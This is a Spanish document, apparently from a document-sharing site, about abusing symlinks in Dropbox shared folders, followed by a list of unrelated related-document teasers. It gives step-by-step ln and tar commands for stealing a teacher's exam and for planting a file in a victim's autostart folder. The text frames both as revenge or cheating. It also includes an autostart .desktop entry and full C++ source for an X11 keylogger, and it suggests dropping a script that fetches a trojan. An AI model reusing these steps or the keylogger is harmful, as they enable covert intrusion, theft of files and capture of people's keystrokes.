Dropbox + symlinks = Privacidad(0)

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Dropbox + symlinks = Privacidad(0)"

Transcripción

1 Dropbox + symlinks = Privacidad(0) Introducción: En este documento intentaré explicaros como Dropbox se puede convertir en un enemigo de vuestra privacidad. Ya cuando se empezaron a usar los programas P2P masivamente, se le empezó a dar importancia a que archivos de tu ordenador compartes con internet y cuales no. Mucha gente, sin darse cuenta, al usar un programa de intercambio p2p estaba permitiendo que cualquier persona robara información personal que el estaba compartiendo. Con el uso de los nuevos servicios en la nube la situación no ha cambiado, sin darte cuenta podrías estar compartiendo información personal con terceros; es más, como describiré en este documento, alguien podría forzar tu ordenador a compartir archivos en la nube, o incluso modificar archivos sensibles de tu equipo. A continuación expondré dos casos de ejemplo. Caso 1: Tenemos dos ordenadores con Dropbox el de un Alumno, y el de un Profesor. El alumno quiere robar un examen que el profesor tiene en su carpeta personal. Además, ese alumno le tiene que entregar una practica a ese profesor. Lo primero que hace el alumno es crear un link simbolico a donde cree que el profesor tiene guardado el examen: (supone el que el profesor tiene la siguiente estructura de carpetas: Carpeta personal -> Carpeta Dropbox -> Carpeta compartida con el alumno -> Carpeta donde se extraera el archivo) ln -s../../../examen./.examen En el caso de no saber donde tiene el examen podría enlazar su carpeta home entera. ln -s /home/./.examen O ir poco a poco bajando en el arbol de directorios de la siguiente forma ln -s../../.examennivel1 ; ln -s../../../.examennivel2 ; etc

2 Bien, ahora el alumno tiene un link simbólico que, colocado en la carpeta compartida con el profesor y estando en el ordenador del profesor, apuntaría al examen. (Pero que en su ordenador, es un link roto) El alumno empaqueta todos los archivos de su trabajo, y en ese paquete, también mete el link que acaba de crear (Diagrama es el archvo que le tiene que enviar al profesor, para más credibilidad, habría muchos mas ficheros) (Examen es el link simbolico que hemos creado; lleva un punto al principio para que sea un archivo oculto, y haya menos posibilidades de que el profesor vea el engaño) tar -cvf Trabajo.tar./.Examen./Diagrama El alumno pone el archivo creado en dropbox. El profesor recibirá el archivo, vera que es un.tar, y lo extraerá. La magia ya esta hecha, cuando el profesor extraiga el.tar, el link simbolico reaccionara y se enlazará con el examen. Acto seguido, como dropbox detecta que ahí hay un archivo, procederá a compartirlo con el alumno. El examen ya es nuestro!! Caso 2: Vale, esto ya es un poco mas serio: Un compañero te ha jodido bien, así que se la vas a devolver. El objetivo es meterle un keylogger en su equipo. Resulta que tenéis una carpeta compartida en Dropbox, asi que siguiendo el ejemplo anterior, vas crear un enlace simbólico; pero esta vez a una ruta especial: (asumimos la misma estructura de directorios que antes) ln -s../../../.config/autostart./.link En $HOME/.config/autostart se almacenan los scripts que se ejecutan (a nivel de usuario) al iniciar sesión en Ubuntu. Lo que hacemos, es crear un link a esa ruta, para introducirle un script. Acto seguido, empaquetamos cualquier cosa que tengamos que compartir con esa persona. tar -cvf Trabajo.tar./.link./Diagrama Y como antes, compartimos ese archivo con el.

3 Cuando lo descomprima, tendremos acceso a su carpeta autostart. Allí colocaremos nuestro keylogger y un fichero.desktop con el siguiente codigo. [Desktop Entry] Type=Application Exec=sh -c '$HOME/.config/autostart/keylogger' Hidden=false NoDisplay=false X-GNOME-Autostart-enabled=true Name[es_ES]=keylogger Name=keylogger Comment[es_ES]= Comment= Cuando el usuario reinicie el equipo, Ubuntu ejecutara sh -c '$HOME/.config/autostart/keylogger', osea, nuestro keylogger. A partir de aquí ya esta todo funcionando: Tan solo tenemos que esperar sentados y recibir los logs. Conclusión: Como hemos visto, sin matarnos mucho podemos infiltrarnos en un ordenador remoto; si un alumno de informática puede hacer esto, que será capaz de hacer un experto en seguridad? Esto es un primer paso, seguramente habrá gente que pueda mejorar la idea, o extenderla a otras plataformas (por ejemplo Dropbox para smartphones). Una cosa a tener en cuenta, es que la víctima en principio va ver toda la actividad de Dropbox, así que es recomendable usar ese túnel lo mínimo posible: Por ejemplo, tan solo colarle un script que lo que haga sea bajarse tu herramienta de administración remota favorita (aka troyano). Tomará Dropbox alguna medida?

4 Bonus: No sabes muy bien como funciona un keylogger, no encuentras uno que te guste, o simplemente quieres uno que funcione con el ejemplo que he puesto? Pues estas de suerte, porque he programado uno en C++ (prácticamente C) y lo adjunto en este documento. Aquí lo tienes! Se compila con g++ -o "keylogger"./keylogger.c -lx11 Y su funcionamiento es el siguiente: Puedes llamarlo sin parámetros o con los tres siguientes: Retardo entre encuestas a X11; retardo entre guardados en el disco, y lugar donde se guardará el log. Un ejemplo:./keylogger 5 10./log Lo primero que va hacer el keylogger es cargar en memoria el mapa de teclas (initkeys). La librería X11 te devuelve el numero asociado a la tecla, por eso tienes que hacer tu la traducción. A continuación inicia las variables de acuerdo con los parámetros que le has pasado (o que no le has pasado) (initconstraints). Un factor a tener en cuenta, es que nuestro keylogger va a guardar el log en disco a intervalos regulares, si esos intervalos son muy grandes se podría perder información, y si son muy pequeños se sobrecargaría el equipo. La solución que tomé se basa en capturar las señales que pueden terminar nuestro programa; cuando se detecta una de esas señales (SIGINT, SIGHUP, SIGTERM), se guarda el log que no se haya guardado hasta ahora, así los intervalos de guardado no tienen que ser muy cortos. Para empezar a comunicarnos con X11 lo primero que hacemos es XopenDisplay, esta llamada nos devuelve un objeto que usaremos para obtener las teclas que actúan sobre esa interfaz X11. Para obtener dichas teclas llamaremos continuamente a XqueryKeymap, que guardara el estado del teclado en un array que más tarde procesaremos. El estado de las teclas se guarda en un array de 32 bytes y cada uno de esos bytes contiene el estado de 8 teclas. Hay que tener cuidado al procesarlo porque en cada byte, el bit menos significativo es en realidad la primera tecla que buscamos. Miramos que ese bit sea un uno if (num & 0x01), y a continuación comprobamos que la tecla no estuviera ya pulsada en la iteración anterior. Si no comprobaramos esto, en vez de hola, obtendríamos hhhhooollllllllaaaa (vamos, ilegible...). Finalmente solo nos queda guardar el log de vez en cuando writelog();currentlog.clear(); En las siguientes páginas puedes ver el código. Espero que no haya sido demasiado tostón la explicación!

5 #include <X11/Xlib.h> #include <X11/Xutil.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <string.h> #include <iostream> #include <fstream> #include <signal.h> using namespace std; // Global variables string currentlog; string savepath; Display *display; * Stores key mapping void initkeys(char keymap[256]) for (int i=0; i<256;i++) keymap[i]=' '; keymap[10] = '1'; keymap[11] = '2'; keymap[12] = '3'; keymap[13] = '4'; keymap[14] = '5'; keymap[15] = '6'; keymap[16] = '7'; keymap[17] = '8'; keymap[16] = '9'; keymap[17] = '0'; keymap[24] = 'q'; keymap[25] = 'w'; keymap[26] = 'e'; keymap[27] = 'r'; keymap[28] = 't'; keymap[29] = 'y'; keymap[30] = 'u'; keymap[31] = 'i'; keymap[32] = 'o'; keymap[33] = 'p'; keymap[36] = '\n'; keymap[38] = 'a'; keymap[39] = 's'; keymap[40] = 'd'; keymap[41] = 'f'; keymap[42] = 'g'; keymap[43] = 'h'; keymap[44] = 'j'; keymap[45] = 'k'; keymap[46] = 'l';

6 keymap[47] = 'ñ'; keymap[52] = 'z'; keymap[53] = 'x'; keymap[54] = 'c'; keymap[55] = 'v'; keymap[56] = 'b'; keymap[57] = 'n'; keymap[58] = 'm'; keymap[65] = ' '; * Writes current user input to log file void writelog() ofstream logfile; logfile.open (savepath.c_str(),ios_base::app); logfile << currentlog; logfile.close(); * Calls writelog when a signal is passed to the process void signalhandler (int n) writelog(); XCloseDisplay(display); exit(0); * Initialization function void initconstraints(int argc, char *argv[], int &timeconstraint, int &saveconstraint) // Sets default log file path char *home; home = getenv ("HOME"); savepath.append(home); savepath.append("/.config/autostart/log"); // Gets data from arguments if (argc == 4) timeconstraint = atoi(argv[1]); saveconstraint = atoi(argv[2]); savepath.clear(); savepath.append(argv[3]); * Sets interruption/termination signal handler

7 * This is recommended to do, because we want to save * the current log string when the program closes, * otherwise we would lose it signal(sigint, signalhandler); signal(sighup, signalhandler); signal(sigterm, signalhandler); int main(int argc, char *argv[]) int timeconstraint = 3; int saveconstraint = 10; char keymap[256]; char keys[32]; bool pressed[256]; bool prevpressed[256]; int iterations = 0; initkeys(keymap); initconstraints(argc, argv, timeconstraint, saveconstraint); display = XOpenDisplay(NULL); DefaultScreen(display); currentlog.clear(); // Kelylogger loop while(1) iterations++; * XQeryKeymap stores key state in a 32 byte array * each bit represents a key state. * Byte N contains the bits for keys 8N to 8N + 7 * Bear in mind this: * The least-significant bit represents key 8N. * So the keys representation would be something like * [7,6,5,4,3,2,1,0];[15,14,13,12,11,10,9,8]... XQueryKeymap(display,keys); for (int i=0; i<32; i++) if (keys[i]!= 0) int pos = 0; int num = keys[i]; while (pos < 8) if (num & 0x01) pressed[i*8+pos] = true;

8 "hhhhheeeeeeellllllllllllllooooo" else * We just want to see new keys * Otherwise, instead of "hello" * We would see if(!prevpressed[i*8+pos]) currentlog.append(&keymap[i*8+pos],1); pressed[i*8+pos] = false; // Go for the next key pos++; * When dividing a binary number by 2 * we eliminate the last digit: * 1010 / 2 = 101 num /= 2; else for (int a=(i*8); a<(i*8+8); a++) pressed[a] = false; // Save currently pressed keys memcpy(prevpressed, pressed, sizeof(prevpressed)); // Save timer if (iterations > saveconstraint*1000/timeconstraint) writelog(); currentlog.clear(); iterations = 0; // Keylogger loop timer usleep(timeconstraint * 1000); Autor: Esteban Pardo Sánchez Agradecimientos a Víctor Cao Rodríguez

Práctica de gsoap. int ns enviar (unsigned nodo, std::string cadena, std::string &resultado); int ns recibir(unsigned nodo, std::string &resultado);

Práctica de gsoap. int ns enviar (unsigned nodo, std::string cadena, std::string &resultado); int ns recibir(unsigned nodo, std::string &resultado); Práctica de gsoap Para desarrollar programas que utilicen gsoap para llevar a cabo las comunicaciones, debemos bajar el paquete gsoap linux 2.7.tgz disponible en: http://atc.ugr.es/pedro/docencia/irhc/irhc.html

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 10 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante INDICE 1.1 EJERCICIO 1: MI PRIMER FICHERO EN BINARIO... 1 1.2 EJERCICIO 2: LEYENDO MI PRIMER FICHERO

Más detalles

ALMACENAMIENTO PERSISTENTE DE DATOS

ALMACENAMIENTO PERSISTENTE DE DATOS UNIVERSIDAD DE MÁLAGA Dpto. Lenguajes y CC. Computación E.T.S.I. Telecomunicación ALMACENAMIENTO PERSISTENTE DE DATOS Tema 1 Programación II Programación II 0 Tema 1: ALMACENAMIENTO PERSISTENTE DE DATOS

Más detalles

El lenguaje de Programación C. Fernando J. Pereda

El lenguaje de Programación C. Fernando J. Pereda <ferdy@gentoo.org> El lenguaje de Programación C Fernando J. Pereda Por qué aprender C? Portable y muy extendido Estándar (C89, C99) El lenguaje de los sistemas Un lenguaje fácil (no, no es broma) Por

Más detalles

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero.

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Uso de Ficheros Todas las estructuras de datos vistas hasta ahora utilizan la

Más detalles

Esquema de un programa en C: bloques básicos

Esquema de un programa en C: bloques básicos Esquema de un programa en C: bloques básicos // Incluimos los ficheros de cabecera que necesitemos. // Esto es un comentario #include #include // Si queremos definir alguna constante,

Más detalles

Ejercicio: Mensajes Alert, Confirm y Prompt

Ejercicio: Mensajes Alert, Confirm y Prompt Ejercicio: Mensajes Alert, Confirm y Prompt Utilizando Javascript podemos crear tres diferentes tipos de mensajes emergentes que se pueden usar para mostrar información, obtener confirmación u obtener

Más detalles

Examen escrito de Programación 1

Examen escrito de Programación 1 Examen escrito de Programación 1 Escuela de Ingeniería y Arquitectura Departamento de Informática e Ingeniería de Sistemas 2 de septiembre de 2015 Se debe disponer sobre la mesa en lugar visible un documento

Más detalles

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Máquina Expendedora (3.5 ptos.)... 1 1.2 Ejercicio 2: Clase Circulo (1.0 pto.)... 3 1.3 Ejercicio

Más detalles

Sistemas Operativos Práctica 3

Sistemas Operativos Práctica 3 Sistemas Operativos Práctica 3 Ing. Andrés Bustamante afbustamanteg@unal.edu.co Ingeniería de Sistemas Facultad de Ingeniería Universidad de la Amazonia 2009 1. Objetivo El objetivo de la práctica es que

Más detalles

[Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman. [Temario]

[Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman. [Temario] [Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman [Temario] -- =================-------- 0x01 : Introduccion 0x02 : Capturar Teclas 0x03 : Capturar el nombre de las ventanas activas

Más detalles

Creacion de Script. Que es un Script?

Creacion de Script. Que es un Script? Creacion de Script Que es un Script? Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución,

Más detalles

Programación: QBASIC

Programación: QBASIC 1. QBASIC Programación: QBASIC Guía del alumno Qbasic es una versión moderna del lenguaje BASIC. Se trata de un lenguaje de alto nivel. En un lenguaje de alto nivel las instrucciones tienen un formato

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 1 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante Prácticas de Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1. Introducción... 1 1.1 Ejercicio 1: Cálculo

Más detalles

Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web.

Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web. ALTA EN DROPBOX Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web. DROPBOX EN LA RED Nos vamos a cualquiera de los navegadores que tengamos

Más detalles

Tema 5: Diseño modular. Índice. Notas. Programación 2. Curso 2014-2015. Notas. Ejemplo. La herramienta make. 1 Diseño modular.

Tema 5: Diseño modular. Índice. Notas. Programación 2. Curso 2014-2015. Notas. Ejemplo. La herramienta make. 1 Diseño modular. : Programación 2 Curso 2014-2015 Índice 1 2 3 (1/2) Cuando el programa crece es necesario dividirlo en módulos Cada módulo agrupa una serie de funciones con algo en común El módulo puede reutilizarse en

Más detalles

Sesión 1. Comandos básicos. Curso 09/10. Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha

Sesión 1. Comandos básicos. Curso 09/10. Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha Curso 09/10 Curso de Enseñanzas Propias Introducción a GNU/Linux Sesión 1 Comandos básicos Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha Contenido Más administración

Más detalles

Problemas comunes en la integración del módulo V.me by Visa en Prestashop

Problemas comunes en la integración del módulo V.me by Visa en Prestashop Problemas comunes en la integración del módulo V.me by Visa en Prestashop Índice' 1.! NO%SE%MUESTRA%EL%MÉTODO%DE%PAGO%...%3! 1.1% LIMPIEZA!Y!DESACTIVACIÓN!DE!LA!CACHÉ!...!3% 1.1.1#Desactivar#/#Borrar#caché#Prestashop#1.4#...#3#

Más detalles

PROGRAMACIÓN N C++ CONSTRUCTORES PROG.C++ L11 CONSTRUCTORES DEL LENGUAJE

PROGRAMACIÓN N C++ CONSTRUCTORES PROG.C++ L11 CONSTRUCTORES DEL LENGUAJE L11 CONSTRUCTORES DEL LENGUAJE CLASES class { } PLANTILLAS template { } ESPACIOS DE NOMBRES namespace { } EXCEPCIONES try catch.. SOBRECARGA DE OPERADORES operator (parametros) BIBLIOTECA

Más detalles

Arquitectura de Computadores: Exámenes y Controles

Arquitectura de Computadores: Exámenes y Controles 2º curso / 2º cuatr. Grado en Ing. Informática Doble Grado en Ing. Informática y Matemáticas Arquitectura de Computadores: Exámenes y Controles Examen de Prácticas AC 05/07/2013 resuelto Material elaborado

Más detalles

INSTALAR UBUNTU DESDE WINDOWS

INSTALAR UBUNTU DESDE WINDOWS INSTALAR UBUNTU DESDE WINDOWS Índice de contenido 1.Descargar Ubuntu 10.04 Lucid Lynx...3 2.Grabar la imagen descargada en un CD...3 2.1.Grabación de una imagen iso con Nero...3 2.2.Grabación de una imagen

Más detalles

1 Estructura básica de un programa C++

1 Estructura básica de un programa C++ Elementos básicos de un lenguaje de alto nivel: C++ CONTENIDOS 1. Estructura básica de un programa C++. 2. Tipos de datos simples. 3. Constantes y variables en C++. Declaración. 4. Operadores y expresiones.

Más detalles

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1 Introducción (1) Personal Home Page Qué es? Acrónimo de : Hypertext Preprocessor. Lenguaje interpretado de alto nivel que permite desarrollar fácilmente páginas dinámicas. Similar a los lenguajes C y Perl.

Más detalles

Tutorial para la comunicación TCP en el BMS Server

Tutorial para la comunicación TCP en el BMS Server Tutorial para la comunicación TCP en el BMS Server Contenido 1. Pasos iniciales para trabajar empleando conexión TCP... 2 2. Configuración de la conexión TCP... 4 2.1. Comprobación de la conexión TCP...

Más detalles

Examen Principios de Programación Febrero 2012

Examen Principios de Programación Febrero 2012 Por favor siga las siguientes indicaciones: Escriba con lápiz. Escriba su nombre y número de documento en todas las hojas que entregue. Numere las hojas e indique el total de hojas en la primera de ellas.

Más detalles

Programación Estructurada

Programación Estructurada Programación Estructurada PROGRAMACIÓN ESTRUCTURADA 1 Sesión No. 11 Nombre: Manejo de archivos Contextualización En los lenguajes de programación estructurada como C, que carecían de una conexión a base

Más detalles

Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse

Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse Versión 3.0 02/12/2010 2 3 1 Control de versiones VERSIÓN AUTOR FECHA CAMBIO 1.0 SAIG, S.L. 22/03/2007

Más detalles

Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO

Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO 1.- Objetivos del laboratorio Diseño de clases en C++ Comprensión y uso del TAD Árbol Binario de Búsqueda

Más detalles

INTRODUCCIÓN AL TIPO COMPUESTO CADENA CONTENIDOS

INTRODUCCIÓN AL TIPO COMPUESTO CADENA CONTENIDOS CONTENIDOS 1. Introducción a las cadenas 2. Definición 3. Declaración de cadenas 4. Inicialización de cadenas 5. Escritura y Lectura de datos tipo cadena 6. Funciones de manipulación de cadenas 7. Arrays

Más detalles

Tutorial Bullet 3D Tema 1 Introducción a Bullet 3D. 1. Introducción a Bullet 3D

Tutorial Bullet 3D Tema 1 Introducción a Bullet 3D. 1. Introducción a Bullet 3D 1. Bullet 3D (http://bulletphysics.org) es un motor 3D utilizado en videojuegos de última generación (Madagascar Kart para X-Box 360) y efectos especiales de películas recientes (2012). Nos ofrece un conjunto

Más detalles

DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0

DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0 DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0 El sistema que detallamos en este tutorial permite automatizar completamente la descarga de series de TV,

Más detalles

Para leer la entrada de consola, lo primero que se hace es construir un Scanner que este asociado al flujo de entrada estándar System.

Para leer la entrada de consola, lo primero que se hace es construir un Scanner que este asociado al flujo de entrada estándar System. CICLO: 01/2010 Universidad Don Bosco Materia: Lenguaje de Programación III Contenido: 1-Lectura de Datos de entrada. 2-Introduccion a JOPTIONPANE. 3-Estructuras de Control. ->LECTURA DE DATOS DE ENTRADA

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor Web Apache Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor Web

Más detalles

Conexión SFTP-SSH2 en PHP a través de un fichero.ppk

Conexión SFTP-SSH2 en PHP a través de un fichero.ppk Conexión SFTP-SSH2 en PHP a través de un fichero.ppk Necesitamos nuestro fichero.ppk Necesitamos crear 2 ficheros de texto plano, uno sin extensión, donde añadiremos una clave privada que tendremos que

Más detalles

Creación de contenidos educativos AS PONTES 2012. http://www.futureworkss.com 1 By Tino Fernández

Creación de contenidos educativos AS PONTES 2012. http://www.futureworkss.com 1 By Tino Fernández AS PONTES 2012 http://www.futureworkss.com 1 By Tino Fernández INTRODUCCIÓN La evolución de la tecnología informática permite impartir las clases de una forma totalmente diferente a como se hacía hasta

Más detalles

Aprendizaje activo: flujos

Aprendizaje activo: flujos Clase 29 Aprendizaje activo: flujos La aplicación Logger 2 1 Objetivos En el marco de trabajo de la aplicación Logger, analizaremos tres formas de leer y escribir datos utilizando flujos de Java: 1. como

Más detalles

Academia técnica de computación A.T.C.

Academia técnica de computación A.T.C. Academia técnica de computación A.T.C. Free Pascal (FPC) El Free Pascal es un compilador Pascal portable, libre y de código abierto, que representa una alternativa a los productos comerciales Turbo Pascal

Más detalles

DiskLogon - Logon en Windows con un Pendrive USB

DiskLogon - Logon en Windows con un Pendrive USB 1 de 10 07/05/2008 23:13 DiskLogon - Logon en Windows con un Pendrive USB DiskLogon - Logearse en Windows con un USB, A partir de este documento, veremos la tremenda disponibilidad que nos permite este

Más detalles

EDITRAN/TR. Windows/Unix. Manual de referencia

EDITRAN/TR. Windows/Unix. Manual de referencia EDITRAN/TR Windows/Unix Manual de referencia INDRA 30 de octubre de 2014 ÍNDICE 1. INTRODUCCIÓN.... 1-1 2. INTERFAZ DE PROGRAMACIÓN.... 2-1 2.1. DESCRIPCION... 2-1 2.2. FUNCIONES DE ENVIO Y RECEPCION...

Más detalles

Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y

Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y Apéndice A Bloques DLL Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y programarlo en lenguaje C, compilarlo dentro de un archivo DLL usando el Microsoft C/C++ o el

Más detalles

TEMA 3: EL LENGUAJE C: PRESENTACIÓN

TEMA 3: EL LENGUAJE C: PRESENTACIÓN TEMA 3: EL LENGUAJE C: PRESENTACIÓN Historia del lenguaje C Características del lenguaje C Estructura de un programa en C El editor de textos: elementos Funciones: de usuario y de librería Librerías de

Más detalles

Traducción de proyectos con GNU gettext en 15 minutos

Traducción de proyectos con GNU gettext en 15 minutos Traducción de proyectos con GNU gettext en 15 minutos José Tomás Tocino García Hackathon UCA - Diciembre 2010 Este documento tiene licencia «Reconocimiento-CompartirIgual 3.0 España» de Creative Commons

Más detalles

Problemas de Redes de Computadores. Conjunto de problemas 1

Problemas de Redes de Computadores. Conjunto de problemas 1 Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Pregunta 1.1: Si configuro mi servidor Web para que no acepte conexiones desde la dirección IP 130.206.1.1,

Más detalles

Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1

Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1 Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Convertidor Dec->Hex y Hex->Dec (5.0 ptos.)... 1 1.1.1 Apartado A (4.0 ptos.)... 1 1.1.2 Apartado B (1.0

Más detalles

MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU

MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU MEDIDAS DIARIAS Extracción automática de los datos Para capturar los datos se usará el programa wnilusender.exe y para graficar la salida de los

Más detalles

Contenidos. Archivos en C++ Archivos en C++ Introducción

Contenidos. Archivos en C++ Archivos en C++ Introducción Contenidos 1. Introducción. 2. Manipulación de ficheros. 3. Organización de archivos. 4. Tipo de almacenamiento. 5. Biblioteca de flujos. 6. Operaciones asociadas a archivos: Abrir fichero, Cerrar fichero,

Más detalles

LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS

LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS 26/05/2013 eduar14_cr@hotmail.com cilred_tlapa@hotmail.com LLAMADAS AL SISTEMA Las llamadas al sistema proporcionan la interfaz entre un proceso y el sistema operativo,

Más detalles

INTELIGENCIA EN REDES DE COMUNICACIONES PRÁCTICA FINAL. Ignacio Ribas Ramos Miguel Flecha Lozano Ingeniería de Telecomunicaciones

INTELIGENCIA EN REDES DE COMUNICACIONES PRÁCTICA FINAL. Ignacio Ribas Ramos Miguel Flecha Lozano Ingeniería de Telecomunicaciones INTELIGENCIA EN REDES DE COMUNICACIONES PRÁCTICA FINAL BLACKJACK Ignacio Ribas Ramos Miguel Flecha Lozano Ingeniería de Telecomunicaciones 1. Explicación del juego de cartas del Blackjack El Blackjack

Más detalles

" ##$ % & '( % & )*+),$ -##$ -!- $! "-./ - 0WebClass1-2

 ##$ % & '( % & )*+),$ -##$ -!- $! -./ - 0WebClass1-2 ! " ##$ % & '( % & )*+),$ -##$ -!- $! "-./ - 0WebClass1-2!" # 345 637 6$5!!!89 & 5 :8-7 & & ;(< 8 $ + - 8 : #= ' 7= : 0 & 0 &- =.> = ;(("9 &? WebClass - 1@#$% &'A1 ;(< 8- ( ) * *+ " $ % B9 5 5 # :!- WebClass

Más detalles

SOLUCION EXAMEN junio 2006

SOLUCION EXAMEN junio 2006 SOLUCION EXAMEN junio 2006 1. Explique razonadamente si las siguientes afirmaciones son verdaderas o falsas: I) (1 p) En UNIX únicamente se distinguen dos tipos de procesos: los procesos de usuario y los

Más detalles

8.1 Un primer bucle FOR... 5 8.2 Varias formas de utilizar el bucle FOR... 5 8.3 Calcular el factorial de un número mediante un bucle FOR...

8.1 Un primer bucle FOR... 5 8.2 Varias formas de utilizar el bucle FOR... 5 8.3 Calcular el factorial de un número mediante un bucle FOR... PROGRAMACIÓN EN C++ PRÁCTICA 08 INTRODUCCIÓN A C++ SENTENCIAS DE CONTROL DEL FLUJO DE UN PROGRAMA: Ejercicio 1. Un primer programa en C++....1 Ejercicio 2. Una conversación en C++....2 Ejercicio 3. Una

Más detalles

Segundo Taller Final de PROGRAMACIÓN ORIENTADO A OBJETOS. INGENIERÍA DE SISTEMAS. Docente y Administrativo: Luz Esperanza Espitia Preciado

Segundo Taller Final de PROGRAMACIÓN ORIENTADO A OBJETOS. INGENIERÍA DE SISTEMAS. Docente y Administrativo: Luz Esperanza Espitia Preciado Segundo Taller Final de PROGRAMACIÓN ORIENTADO A OBJETOS. Código: O613 INGENIERÍA DE SISTEMAS Docente y Administrativo: Luz Esperanza Espitia Preciado Componente: Teórico Práctico. F. Vigencia: 8/10/2.012

Más detalles

TRUE CRYPT ::: Encriptación de datos :::

TRUE CRYPT ::: Encriptación de datos ::: TRUE CRYPT ::: Encriptación de datos ::: TrueCrypt está desarrollado bajo software libre y además es multiplataforma. Es muy importante estas dos premisas ya que no importará si trabajamos bajo Linux o

Más detalles

Bases de datos. 1. Introducción

Bases de datos. 1. Introducción Bases de datos 1. Introducción Habitualmente, los programas trabajan con información que está en un fichero. Por ejemplo, nuestro simulador de tráfico aéreo trabaja con una lista de planes de vuelo que

Más detalles

SEGUNDO PARCIAL INFORMATICA II

SEGUNDO PARCIAL INFORMATICA II SEGUNDO PARCIAL INFORMATICA II Tema 1 Hacer un programa en C++ que realice lo siguiente: a. Generar los primeros 100 números enteros comenzando en 1 y guardar los impares en una pila y los pares en una

Más detalles

Fundamentos de programación I. - Anexo de Software -

Fundamentos de programación I. - Anexo de Software - Fundamentos de programación I - - 1. Introducción 1.1. Introducción a Dev-C++ y DJGPP 1.1.1. Qué es Dev-C++? Dev-C++ es un Entorno Integrado de Desarrollo (Integrated Development Environment, IDE) capaz

Más detalles

Introducción a la Programación en MATLAB

Introducción a la Programación en MATLAB Introducción a la Programación en MATLAB La programación en MATLAB se realiza básicamente sobre archivos M, o M-Files. Se los denomina de esta forma debido a su extensión.m. Estos archivos son simple archivos

Más detalles

Introducción al laboratorio de Programación I

Introducción al laboratorio de Programación I Introducción al laboratorio de Programación I Manuel Montenegro montenegro@fdi.ucm.es es Despacho B12 Compilación Es el proceso de transformación de un programa escrito en un lenguaje de alto nivel (en

Más detalles

ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES

